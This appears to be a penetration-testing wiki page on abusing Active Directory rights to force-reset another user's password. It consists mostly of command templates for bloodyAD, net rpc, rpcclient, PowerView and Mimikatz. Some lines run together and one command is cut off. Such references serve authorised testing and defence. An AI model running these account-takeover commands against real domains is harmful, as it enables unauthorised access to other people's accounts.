ForceChangePassword
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.
Alternative #1: using bloodyAD:
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPasswAlternative #2: using net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
# With net and cleartext credentials (will be prompted)
$ net rpc password $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController
# With net and cleartext credentials
$ net rpc password $TargetUser -U $DOMAIN/$ControlledUser%$Password -S
Alternative #3: rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.
rpcclient -U $DOMAIN/$ControlledUser $DomainController
rpcclient $> setuserinfo2 $TargetUser 23 $NewPasswordAlternative #1: The attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPasswordAlternative #2: Mimikatz's lsadump::setntlm can also be used for that purpose.